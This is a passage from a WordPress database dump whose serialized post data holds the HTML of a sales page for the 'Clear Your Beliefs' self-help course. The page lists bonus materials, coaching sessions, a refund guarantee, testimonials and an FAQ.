your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>==>> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>==>> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n	<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n	<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>Optional:</strong> Professional Coaching Sessions.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1913, 2213, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72946:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent 